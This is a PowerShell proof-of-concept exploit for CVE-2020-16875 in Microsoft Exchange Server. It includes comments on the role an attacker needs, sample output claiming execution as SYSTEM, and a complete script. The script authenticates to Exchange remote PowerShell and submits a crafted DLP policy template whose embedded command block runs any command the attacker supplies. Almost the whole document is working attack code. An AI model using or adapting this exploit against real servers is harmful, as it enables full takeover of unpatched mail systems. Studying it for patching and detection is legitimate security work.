# Microsoft Exchange Server DlpUtils AddTenantDlpPolicy Remote Code Execution Vulnerability
# Patch: https://portal.msrc.microsoft.com/en-us/security-guidance/advisory/CVE-2020-16875
#
# Notes:
#
# The (ab)user needs the "Data Loss Prevention" role assigned
# [PS] C:\Windows\system32>New-RoleGroup -Name "dlp users" -Roles "Data Loss Prevention" -Members "harrym"
# 
# Name      AssignedRoles          RoleAssignments                  ManagedBy
# ----      -------------          ---------------                  ---------
# dlp users {Data Loss Prevention} {Data Loss Prevention-dlp users} {exchangedemo.com/Microsoft Exchange Security Groups/Organization Management, exchangedemo.com/Users/test}
# 
# 
# [PS] C:\Windows\system32>Get-RoleGroup "dlp users" | Format-List
# 
# RunspaceId                  : 098e1140-30e3-4144-8028-2174fdb43b85
# ManagedBy                   : {exchangedemo.com/Microsoft Exchange Security Groups/Organization Management, exchangedemo.com/Users/test}
# RoleAssignments             : {Data Loss Prevention-dlp users}
# Roles                       : {Data Loss Prevention}
# DisplayName                 :
# ExternalDirectoryObjectId   :
# Members                     : {exchangedemo.com/Users/Harry Mull}
# SamAccountName              : dlp users
# Description                 :
# RoleGroupType               : Standard
# LinkedGroup                 :
# Capabilities                : {}
# LinkedPartnerGroupId        :
# LinkedPartnerOrganizationId :
# Identity                    : exchangedemo.com/Microsoft Exchange Security Groups/dlp users
# IsValid                     : True
# ExchangeVersion             : 0.10 (14.0.100.0)
# Name                        : dlp users
# DistinguishedName           : CN=dlp users,OU=Microsoft Exchange Security Groups,DC=exchangedemo,DC=com
# Guid                        : fa5c8458-8255-4ffd-b128-2a66bf9dbfd6
# ObjectCategory              : exchangedemo.com/Configuration/Schema/Group
# ObjectClass                 : {top, group}
# WhenChanged                 : 6/12/2020 11:29:31 PM
# WhenCreated                 : 6/12/2020 11:29:31 PM
# WhenChangedUTC              : 6/12/2020 3:29:31 PM
# WhenCreatedUTC              : 6/12/2020 3:29:31 PM
# OrganizationId              :
# Id                          : exchangedemo.com/Microsoft Exchange Security Groups/dlp users
# OriginatingServer           : DEAD01.exchangedemo.com
# ObjectState                 : Changed
#
# Example:
#
# PS C:\Users\researcher> .\poc.ps1 -server WIN-0K4AOM2JIN6.exchangedemo.com -usr harrym@exchangedemo.com -pwd user123### -cmd mspaint
# (+) targeting WIN-0K4AOM2JIN6.exchangedemo.com with harrym@exchangedemo.com:user123###
# (+) executed mspaint as SYSTEM!
# PS C:\Users\researcher>

param (
    [Parameter(Mandatory=$true)][string]$server,
    [Parameter(Mandatory=$true)][string]$usr,
    [Parameter(Mandatory=$true)][string]$pwd,
    [string]$cmd = "mspaint"
)

Function Get-RandomAlphanumericString {
    [CmdletBinding()]
    Param (
        [int] $length = 8
    )
    Process{
        Write-Output ( -join ((0x30..0x39) + ( 0x41..0x5A) + ( 0x61..0x7A) | Get-Random -Count $length  | % {[char]$_}) )
    }	
}

function Exploit-Exchange {
    Param (
        [string] $server,
        [string] $usr,
        [string] $pwd,
        [string] $cmd
    )
    "(+) targeting $server with ${usr}:$pwd"
    $securepwd = ConvertTo-SecureString $pwd -AsPlainText -Force
    $creds = New-Object System.Management.Automation.PSCredential -ArgumentList ($usr, $securepwd)
    $s = New-PSSession -ConfigurationName Microsoft.Exchange -ConnectionUri http://$server/PowerShell/ -Authentication Kerberos -Credential $creds

    $xml = @"
<dlpPolicyTemplates>
  <dlpPolicyTemplate id="F7C29AEC-A52D-4502-9670-141424A83FAB" mode="Audit" state="Enabled" version="15.0.2.0">
    <contentVersion>4</contentVersion>
    <publisherName>si</publisherName>
    <name>
      <localizedString lang="en"></localizedString>
    </name>
    <description>
      <localizedString lang="en"></localizedString>
    </description>
    <keywords></keywords>
    <ruleParameters></ruleParameters>
    <policyCommands>
      <commandBlock>
        <![CDATA[ `$i=New-object System.Diagnostics.ProcessStartInfo;`$i.UseShellExecute=`$true;`$i.FileName="cmd";`$i.Arguments="/c $cmd";`$r=New-Object System.Diagnostics.Process;`$r.StartInfo=`$i;`$r.Start() ]]>
      </commandBlock>
    </policyCommands>
    <policyCommandsResources></policyCommandsResources>
  </dlpPolicyTemplate>
</dlpPolicyTemplates>"@

    $n = Get-RandomAlphanumericString
    [Byte[]]$d = [System.Text.Encoding]::UTF8.GetBytes($xml)
    Invoke-Command -Session $s -ScriptBlock {
        New-DlpPolicy -Name $Using:n -TemplateData $Using:d 
    } | Out-Null
    "(+) executed $cmd as SYSTEM!"	
}

Get-PSSession | Remove-PSSession
Exploit-Exchange -server $server -usr $usr -pwd $pwd -cmd $cmd